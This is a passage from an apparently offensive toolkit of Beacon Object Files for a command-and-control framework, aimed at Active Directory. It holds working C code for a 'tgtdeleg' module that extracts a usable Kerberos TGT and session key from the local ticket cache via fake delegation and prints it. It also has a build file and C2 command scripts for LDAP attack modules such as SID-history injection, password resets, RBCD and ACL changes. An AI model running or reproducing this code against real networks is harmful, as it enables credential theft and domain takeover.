        S4UExecute_Ticket(ticket, targetUser, targetSPN, (targetDC ? targetDC : dc), altSname, kirbi_tgs, self, opsec, ptt, encType, targetDC, targetDomain, (impersonateDomain ? impersonateDomain : domain));
//    else if (user && hash)
//        S4UExecute_User(user, domain, hash, curEType, encType, targetUser, targetSPN, dc, altSname, kirbi_tgs, self, opsec, ptt, pac, NULL, NULL);
    else
        PRINT_OUT("\n[X] A /ticket:X needs to be supplied for S4U!\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        ASK_S4U_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/tgtdeleg/tgtdeleg.c
================================================
#include "_include/asn_encode.c"
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_dec.c"

BOOL GetLsaHandle( HANDLE* hLsa ) {
    HANDLE hLsaLocal;
    bool   status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    *hLsa = hLsaLocal;
    return status;
}

int my_memcmp(byte* s1, byte* s2, int len) {
    int i = 0;
    while ((s1[i] == s2[i]) && (i < len))
        i++;
    if (i == len)
        return 0;
    else
        return (int)((unsigned char)s1[i] - (unsigned char)s2[i]);
}

byte* SearchBytePattern(byte* pattern, int pSize, byte* buf, int bSize) {
    BOOL status = FALSE;
    byte* result = NULL;
    byte* limit = buf + bSize;
    byte* current = buf;

    for (; !status && (current + pSize <= limit); current++)
        status = !my_memcmp(pattern, current, pSize);

    if (status)
        result = current - 1;

    return result;
}

bool GetEncryptionKeyFromCache(char* target, int encType, byte** key, int* keySize) {
    bool status = true;

    HANDLE hLsa;
    if (GetLsaHandle(&hLsa)) return true;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (!SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage)) {

        int targetLength = my_strlen(target) * 2 + 2;
        int requestSize = targetLength + sizeof(KERB_RETRIEVE_TKT_REQUEST);
        PKERB_RETRIEVE_TKT_REQUEST request = MemAlloc(requestSize * sizeof(KERB_RETRIEVE_TKT_REQUEST));

        request->MessageType = KerbRetrieveEncodedTicketMessage;
        request->CacheOptions = KERB_RETRIEVE_TICKET_USE_CACHE_ONLY;
        request->EncryptionType = encType;
        request->TargetName.Length = targetLength - 2;
        request->TargetName.MaximumLength = targetLength;
        request->TargetName.Buffer = ((byte*)request) + sizeof(KERB_RETRIEVE_TKT_REQUEST);
        KERNEL32$MultiByteToWideChar(CP_ACP, 0, target, targetLength / 2, request->TargetName.Buffer, targetLength);

        PKERB_RETRIEVE_TKT_RESPONSE response = NULL;
        NTSTATUS protocolStatus = 0;
        status = SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, request, requestSize, &response, &requestSize, &protocolStatus);
        if (!status && !protocolStatus && requestSize > 0) {
            *key = MemAlloc(response->Ticket.SessionKey.Length);
            MemCpy(*key, response->Ticket.SessionKey.Value, response->Ticket.SessionKey.Length);
            *keySize = response->Ticket.SessionKey.Length;
            SECUR32$LsaFreeReturnBuffer(&response);
        }
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
    return status;
}

void TgtDeleg(char* targetSPN) {

    if (targetSPN == NULL) {
        PDOMAIN_CONTROLLER_INFOA pDomainControllerInfo = NULL;
        DWORD dwError = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, DS_DIRECTORY_SERVICE_REQUIRED, &pDomainControllerInfo);
        if (dwError == ERROR_SUCCESS) {

            int l = my_strlen(((char*)pDomainControllerInfo->DomainControllerName) + 2);
            targetSPN = MemAlloc(6 + l);
            MemCpy(targetSPN, "CIFS/", 5);
            MemCpy(targetSPN + 5, ((char*)pDomainControllerInfo->DomainControllerName) + 2, l + 1);

            if (pDomainControllerInfo != NULL)
                NETAPI32$NetApiBufferFree(pDomainControllerInfo);
        }
        else {
            return;
        }
    }

    CredHandle phCredential = { 0 };
    TimeStamp  ptsExpiry = { 0 };
    SECURITY_STATUS status = SECUR32$AcquireCredentialsHandleA(NULL, "Kerberos", SECPKG_CRED_OUTBOUND, NULL, NULL, 0, NULL, &phCredential, &ptsExpiry);

    if (status == 0) {
        PRINT_OUT("[*] Initializing Kerberos GSS-API w/ fake delegation for target '%s'\n", targetSPN);

        CtxtHandle    ClientContext = { 0 };
        SecBuffer     ClientTokenArray = { 0, SECBUFFER_TOKEN, NULL };
        SecBufferDesc ClientToken = { SECBUFFER_VERSION, 1, &ClientTokenArray };
        UINT ClientContextAttributes = 0;
        status = SECUR32$InitializeSecurityContextA(&phCredential, NULL, targetSPN, ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_DELEGATE | ISC_REQ_MUTUAL_AUTH, 0, SECURITY_NATIVE_DREP, NULL, 0, &ClientContext, &ClientToken, &ClientContextAttributes, NULL);

        if ((status == SEC_E_OK) || (status == SEC_I_CONTINUE_NEEDED)) {
            PRINT_OUT("[+] Kerberos GSS-API initialization success!\n");

            if ((ClientContextAttributes & ISC_REQ_DELEGATE) == 1) {
                PRINT_OUT("[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.\n");

                byte KeberosV5[] = { 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x01, 0x02, 0x02 }; // 1.2.840.113554.1.2.2

                byte* startIndex = SearchBytePattern(KeberosV5, 11, ClientTokenArray.pvBuffer, ClientTokenArray.cbBuffer);
                if (startIndex != NULL) {
                    startIndex += 11;

                    if (startIndex[0] == 1 && startIndex[1] == 0) {
                        PRINT_OUT("[*] Found the AP-REQ delegation ticket in the GSS-API output.\n");

                        int apReqArrayLength = ClientTokenArray.cbBuffer - (startIndex - (byte*)ClientTokenArray.pvBuffer) - 2;

                        AsnElt asn_AP_REQ = { 0 };
                        if (BytesToAsnDecode3(startIndex + 2, apReqArrayLength, false, &asn_AP_REQ)) return; // apReqArrayLength -2

                        for (int i = 0; i < asn_AP_REQ.sub[0].subCount; i++) {
                            AsnElt elt = asn_AP_REQ.sub[0].sub[i];

                            if (elt.tagValue == 4) {
                                EncryptedData encAuthenticator = { 0 };
                                if (AsnGetEncryptedData(&(elt.sub[0]), &encAuthenticator)) return;
                                int authenticatorEtype = encAuthenticator.etype;

                                PRINT_OUT("[*] Authenticator etype: (%d)\n", authenticatorEtype);

                                byte* key = NULL;
                                int   keySize = 0;
                                if (!GetEncryptionKeyFromCache(targetSPN, authenticatorEtype, &key, &keySize) && keySize > 0) {

                                    byte* base64SessionKey = base64_encode(key, keySize);
                                    PRINT_OUT("[*] Extracted the service ticket session key from the ticket cache: %s\n", base64SessionKey);

                                    byte* rawBytes = NULL;
                                    size_t rawBytesSize = 0;
                                    if (decrypt(key, authenticatorEtype, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, encAuthenticator.cipher, encAuthenticator.cipher_size, &rawBytes, &rawBytesSize))return;

                                    AsnElt asnAuthenticator = { 0 };
                                    if (BytesToAsnDecode3(rawBytes, rawBytesSize, false, &asnAuthenticator)) return;

                                    for (int j = 0; j < asnAuthenticator.sub[0].subCount; j++) {
                                        AsnElt elt2 = asnAuthenticator.sub[0].sub[j];

                                        if (elt2.tagValue == 3) {
                                            PRINT_OUT("[+] Successfully decrypted the authenticator\n");

                                            int cksumtype = 0;
                                            if (AsnGetInteger(&(elt2.sub[0].sub[0].sub[0]), &cksumtype)) return;

                                            if (cksumtype == 0x8003) {
                                                byte* checksumBytes = NULL;
                                                int   checksumBytesSize = 0;
                                                if (AsnGetOctetString(&(elt2.sub[0].sub[1].sub[0]), &checksumBytes, &checksumBytesSize)) return;

                                                if ((checksumBytes[20] & 1) == 1) {

                                                    uint dLen = *((short*)(checksumBytes + 26));
                                                    AsnElt asn_KRB_CRED = { 0 };
                                                    if (BytesToAsnDecode3(checksumBytes + 28, dLen, false, &asn_KRB_CRED)) return;

                                                    Ticket ticket = { 0 };
                                                    KRB_CRED cred = { 0 };
                                                    cred.pvno = 5;
                                                    cred.msg_type = 22;
                                                    cred.ticket_count = 1;
                                                    cred.tickets = MemAlloc(sizeof(Ticket));
                                                    cred.enc_part.ticket_count = 1;
                                                    cred.enc_part.ticket_info = MemAlloc(sizeof(Ticket));

                                                    for (int k = 0; k < asn_KRB_CRED.sub[0].subCount; k++) {
                                                        AsnElt elt3 = asn_KRB_CRED.sub[0].sub[k];

                                                        if (elt3.tagValue == 2) {
                                                            if (AsnGetTicket(&(elt3.sub[0].sub[0].sub[0]), &ticket)) return;
                                                            cred.tickets[0] = ticket;
                                                        }
                                                        else if (elt3.tagValue == 3) {

                                                            byte* enc_part = NULL;
                                                            int enc_part_size = 0;
                                                            if (AsnGetOctetString(&(elt3.sub[0].sub[1]), &enc_part, &enc_part_size)) return;

                                                            byte* rawBytes2 = NULL;
                                                            size_t rawBytes2Size = 0;
                                                            if (decrypt(key, authenticatorEtype, KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART, enc_part, enc_part_size, &rawBytes2, &rawBytes2Size))return;

                                                            AsnElt encKrbCredPartAsn = { 0 };
                                                            if (BytesToAsnDecode3(rawBytes2, rawBytes2Size, false, &encKrbCredPartAsn)) return;

                                                            KrbCredInfo cred_info = { 0 };
                                                            if (AsnGetKrbCredInfo(&(encKrbCredPartAsn.sub[0].sub[0].sub[0].sub[0]), &cred_info)) return;

                                                            cred.enc_part.ticket_info[0] = cred_info;
                                                        }
                                                    }

                                                    AsnElt asnCred = { 0 };
                                                    if (AsnKrbCredEncode(&cred, &asnCred)) return;

                                                    byte* kirbiBytes = NULL;
                                                    int   kirbiBytesSize = 0;
                                                    if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return;

                                                    char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);
                                                    PRINT_OUT("[*] base64(ticket.kirbi):\n\n%s\n\n", kirbiString);
                                                }
                                            }
                                            else {
                                                PRINT_OUT("[X] Error: Invalid checksum type: %d\n", cksumtype);
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
                else {
                    PRINT_OUT("[X] Error: Kerberos OID not found in output buffer!\n");
                }
            }
        }
        else {
            PRINT_OUT("[X] Error: Kerberos GSS-API not initializated...\n");
        }
        SECUR32$DeleteSecurityContext(&ClientContext);
    }
    SECUR32$FreeCredentialsHandle(&phCredential);
}

void TGTDELEG_RUN( PCHAR Buffer, DWORD Length ) {
    char* target = NULL;

    for (int i = 0; i < Length; i++)
        i += GetStrParam(Buffer + i, Length - i, "/target:", 8, &target );

    TgtDeleg(target);
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        TGTDELEG_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/LDAP-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)

set(CMAKE_C_STANDARD 99)

# Include directories
include_directories(
#    ${CMAKE_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}/_include
    ${CMAKE_CURRENT_SOURCE_DIR}/src/common
)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -masm=intel -fno-stack-protector -mno-stack-arg-probe -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# GET operations
add_library(ldap_get_users OBJECT src/get/get-users.c)
add_library(ldap_get_computers OBJECT src/get/get-computers.c)
add_library(ldap_get_groups OBJECT src/get/get-groups.c)
add_library(ldap_get_usergroups OBJECT src/get/get-usergroups.c)
add_library(ldap_get_groupmembers OBJECT src/get/get-groupmembers.c)
add_library(ldap_get_object OBJECT src/get/get-object.c)
add_library(ldap_get_domaininfo OBJECT src/get/get-domaininfo.c)
add_library(ldap_get_maq OBJECT src/get/get-maq.c)
add_library(ldap_get_writable OBJECT src/get/get-writable.c)
add_library(ldap_get_delegation OBJECT src/get/get-delegation.c)
add_library(ldap_get_uac OBJECT src/get/get-uac.c)
add_library(ldap_get_attribute OBJECT src/get/get-attribute.c)
add_library(ldap_get_spn OBJECT src/get/get-spn.c)
add_library(ldap_get_acl OBJECT src/get/get-acl.c)
add_library(ldap_get_rbcd OBJECT src/get/get-rbcd.c)

# ADD operations
add_library(ldap_add_user OBJECT src/add/add-user.c)
add_library(ldap_add_computer OBJECT src/add/add-computer.c)
add_library(ldap_add_group OBJECT src/add/add-group.c)
add_library(ldap_add_groupmember OBJECT src/add/add-groupmember.c)
add_library(ldap_add_ou OBJECT src/add/add-ou.c)
add_library(ldap_add_sidhistory OBJECT src/add/add-sidhistory.c)
add_library(ldap_add_spn OBJECT src/add/add-spn.c)
add_library(ldap_add_attribute OBJECT src/add/add-attribute.c)
add_library(ldap_add_uac OBJECT src/add/add-uac.c)
add_library(ldap_add_delegation OBJECT src/add/add-delegation.c)
add_library(ldap_add_rbcd OBJECT src/add/add-rbcd.c)
add_library(ldap_add_ace OBJECT src/add/add-ace.c)

# SET operations
add_library(ldap_set_password OBJECT src/set/set-password.c)
add_library(ldap_set_spn OBJECT src/set/set-spn.c)
add_library(ldap_set_delegation OBJECT src/set/set-delegation.c)
add_library(ldap_set_attribute OBJECT src/set/set-attribute.c)
add_library(ldap_set_uac OBJECT src/set/set-uac.c)
add_library(ldap_set_owner OBJECT src/set/set-owner.c)

# MOVE operations
add_library(ldap_move_object OBJECT src/move/move-object.c)

# REMOVE operations
add_library(ldap_remove_groupmember OBJECT src/remove/remove-groupmember.c)
add_library(ldap_remove_object OBJECT src/remove/remove-object.c)
add_library(ldap_remove_delegation OBJECT src/remove/remove-delegation.c)
add_library(ldap_remove_spn OBJECT src/remove/remove-spn.c)
add_library(ldap_remove_attribute OBJECT src/remove/remove-attribute.c)
add_library(ldap_remove_rbcd OBJECT src/remove/remove-rbcd.c)
add_library(ldap_remove_ace OBJECT src/remove/remove-ace.c)
add_library(ldap_remove_uac OBJECT src/remove/remove-uac.c)

# Create _bin directory
file(MAKE_DIRECTORY ../_bin/LDAP)

# Macro for copy targets
macro(ldap_copy_target target_name output_name)
    add_custom_target(copy_${target_name} ALL
        COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:${target_name}> ../_bin/LDAP/${output_name}.x64.o
        DEPENDS ${target_name}
        COMMENT "Copying ${output_name} object file"
    )
endmacro()

# GET copy targets
ldap_copy_target(ldap_get_users get-users)
ldap_copy_target(ldap_get_computers get-computers)
ldap_copy_target(ldap_get_groups get-groups)
ldap_copy_target(ldap_get_usergroups get-usergroups)
ldap_copy_target(ldap_get_groupmembers get-groupmembers)
ldap_copy_target(ldap_get_object get-object)
ldap_copy_target(ldap_get_domaininfo get-domaininfo)
ldap_copy_target(ldap_get_maq get-maq)
ldap_copy_target(ldap_get_writable get-writable)
ldap_copy_target(ldap_get_delegation get-delegation)
ldap_copy_target(ldap_get_uac get-uac)
ldap_copy_target(ldap_get_attribute get-attribute)
ldap_copy_target(ldap_get_spn get-spn)
ldap_copy_target(ldap_get_acl get-acl)
ldap_copy_target(ldap_get_rbcd get-rbcd)

# ADD copy targets
ldap_copy_target(ldap_add_user add-user)
ldap_copy_target(ldap_add_computer add-computer)
ldap_copy_target(ldap_add_group add-group)
ldap_copy_target(ldap_add_groupmember add-groupmember)
ldap_copy_target(ldap_add_ou add-ou)
ldap_copy_target(ldap_add_sidhistory add-sidhistory)
ldap_copy_target(ldap_add_spn add-spn)
ldap_copy_target(ldap_add_attribute add-attribute)
ldap_copy_target(ldap_add_uac add-uac)
ldap_copy_target(ldap_add_delegation add-delegation)
ldap_copy_target(ldap_add_rbcd add-rbcd)
ldap_copy_target(ldap_add_ace add-ace)

# SET copy targets
ldap_copy_target(ldap_set_password set-password)
ldap_copy_target(ldap_set_spn set-spn)
ldap_copy_target(ldap_set_delegation set-delegation)
ldap_copy_target(ldap_set_attribute set-attribute)
ldap_copy_target(ldap_set_uac set-uac)
ldap_copy_target(ldap_set_owner set-owner)

# MOVE copy targets
ldap_copy_target(ldap_move_object move-object)

# REMOVE copy targets
ldap_copy_target(ldap_remove_groupmember remove-groupmember)
ldap_copy_target(ldap_remove_object remove-object)
ldap_copy_target(ldap_remove_delegation remove-delegation)
ldap_copy_target(ldap_remove_spn remove-spn)
ldap_copy_target(ldap_remove_attribute remove-attribute)
ldap_copy_target(ldap_remove_rbcd remove-rbcd)
ldap_copy_target(ldap_remove_ace remove-ace)
ldap_copy_target(ldap_remove_uac remove-uac)


================================================
FILE: AD-BOF/LDAP-BOF/LDAP.axs
================================================
var metadata = {
    name: "LDAP-BOF",
    description: "LDAP Exploitation BOFs"
};

// ============================================================================
// Helper function to determine if input is a username or a distinguished name
// ============================================================================
function identifyInputType(input) {
    const usernameRegex = /^[a-zA-Z0-9._-]{1,64}$/;
    const dnRegex = /^(?:[A-Z]+=[^,]+)(?:,(?:[A-Z]+=[^,]+))*$/i;
    if (dnRegex.test(input)) {
        return 1;
    } else if (usernameRegex.test(input)) {
        return 0;
    } else {
        return 0;
    }
}

// ============================================================================
// GET COMMANDS
// ============================================================================

var _cmd_getusers = ax.create_command(
    "get-users",
    "List all users in the domain",
    "ldap get-users -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local -a description,mail"
);
_cmd_getusers.addArgFlagString("-ou", "ou_path", false, "OU path to search (optional)");
_cmd_getusers.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getusers.addArgFlagString("-a", "attributes", false, "Comma-separated list of attributes to retrieve (always includes sAMAccountName)");
_cmd_getusers.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getusers.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let attributes = parsed_json["attributes"] || "";

    let bof_params = ax.bof_pack("cstr,cstr,int,cstr", [ou_path, dc_fqdn, use_ldaps, attributes]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-users." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Enumerating domain users...");
});



var _cmd_getcomputers = ax.create_command(
    "get-computers",
    "List all computers in the domain",
    "ldap get-computers -ou \"OU=Computers,DC=domain,DC=local\" -dc dc01.domain.local -a description,operatingSystem"
);
_cmd_getcomputers.addArgFlagString("-ou", "ou_path", false, "OU path to search (optional)");
_cmd_getcomputers.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getcomputers.addArgFlagString("-a", "attributes", false, "Comma-separated list of attributes to retrieve (always includes sAMAccountName)");
_cmd_getcomputers.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getcomputers.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let attributes = parsed_json["attributes"] || "";

    let bof_params = ax.bof_pack("cstr,cstr,int,cstr", [ou_path, dc_fqdn, use_ldaps, attributes]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-computers." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Enumerating domain computers...");
});



var _cmd_getgroups = ax.create_command(
    "get-groups",
    "List all groups in the domain",
    "ldap get-groups -ou \"OU=Groups,DC=domain,DC=local\" -dc dc01.domain.local -a description,member"
);
_cmd_getgroups.addArgFlagString("-ou", "ou_path", false, "OU path to search (optional)");
_cmd_getgroups.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getgroups.addArgFlagString("-a", "attributes", false, "Comma-separated list of attributes to retrieve (always includes sAMAccountName)");
_cmd_getgroups.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getgroups.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let attributes = parsed_json["attributes"] || "";

    let bof_params = ax.bof_pack("cstr,cstr,int,cstr", [ou_path, dc_fqdn, use_ldaps, attributes]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-groups." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Enumerating domain groups...");
});



var _cmd_getusergroups = ax.create_command(
    "get-usergroups",
    "List all groups a user is a member of",
    "ldap get-usergroups jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getusergroups.addArgString("user", true, "Username or DN");
_cmd_getusergroups.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getusergroups.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getusergroups.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getusergroups.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let user = parsed_json["user"];
    let is_dn = identifyInputType(user);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [user, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-usergroups." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying groups for ${user}...`);
});



var _cmd_getgroupmembers = ax.create_command(
    "get-groupmembers",
    "List all members of a group",
    "ldap get-groupmembers \"Domain Admins\" -ou \"OU=Groups,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getgroupmembers.addArgString("group", true, "Group name or DN");
_cmd_getgroupmembers.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getgroupmembers.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getgroupmembers.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let group = parsed_json["group"];
    let is_dn = identifyInputType(group);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr", [group, is_dn, ou_path, dc_fqdn]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-groupmembers." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying members of ${group}...`);
});



var _cmd_getobject = ax.create_command(
    "get-object",
    "Get all attributes of an object",
    "ldap get-object jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getobject.addArgString("target", true, "Object name or DN");
_cmd_getobject.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getobject.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getobject.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getobject.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-object." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying object ${target}...`);
});



var _cmd_getdomaininfo = ax.create_command(
    "get-domaininfo",
    "Get domain information from rootDSE",
    "ldap get-domaininfo -dc dc01.domain.local"
);
_cmd_getdomaininfo.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getdomaininfo.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getdomaininfo.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int", [dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-domaininfo." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Querying domain information...");
});



var _cmd_getmaq = ax.create_command(
    "get-maq",
    "Get machine account quota (ms-DS-MachineAccountQuota)",
    "ldap get-maq -dc dc01.domain.local"
);
_cmd_getmaq.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getmaq.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getmaq.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int", [dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-maq." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Querying machine account quota...");
});



var _cmd_getwritable = ax.create_command(
    "get-writable",
    "Find objects you have write access to",
    "ldap get-writable -ou \"OU=Projects,DC=domain,DC=local\" -dc dc01.domain.local --detailed"
);
_cmd_getwritable.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getwritable.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getwritable.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getwritable.addArgBool("--detailed", "Show detailed output");
_cmd_getwritable.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let detailed = parsed_json["--detailed"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,cstr,int,int", [ou_path, dc_fqdn, use_ldaps, detailed]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-writable." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Finding writable objects...");
});



var _cmd_getdelegation = ax.create_command(
    "get-delegation",
    "Get delegation configuration for an object",
    "ldap get-delegation jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getdelegation.addArgString("target", true, "Object name or DN");
_cmd_getdelegation.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getdelegation.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getdelegation.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getdelegation.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-delegation." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying delegation for ${target}...`);
});



var _cmd_getuac = ax.create_command(
    "get-uac",
    "Get UAC flags for an object",
    "ldap get-uac jane.doe -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getuac.addArgString("target", true, "Object name or DN");
_cmd_getuac.addArgFlagString("-ou", "ou_path", false, "OU path to search");
_cmd_getuac.addArgFlagString("-dc", "dc_fqdn", false, "Domain Controller FQDN");
_cmd_getuac.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_getuac.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_fqdn = parsed_json["dc_fqdn"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int", [target, is_dn, ou_path, dc_fqdn, use_ldaps]);
    let bof_path = ax.script_dir() + "_bin/LDAP/get-uac." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `Querying UAC for ${target}...`);
});



var _cmd_getattribute = ax.create_command(
    "get-attribute",
    "Get specific attribute values (comma-separated list supported)",
    "ldap get-attribute jane.doe objectSid,mail,description -ou \"OU=Users,DC=domain,DC=local\" -dc dc01.domain.local"
);
_cmd_getattribute.addArgString("target", true, "Object name or DN");
_cmd_getattribute.addArgString("attributes", true, "Comma-separated list of attribute names to retrieve (always includes sAMAccountName)");
_cmd_getattribute.addArgFlagString("-ou", "ou_path", false, "OU path to search");
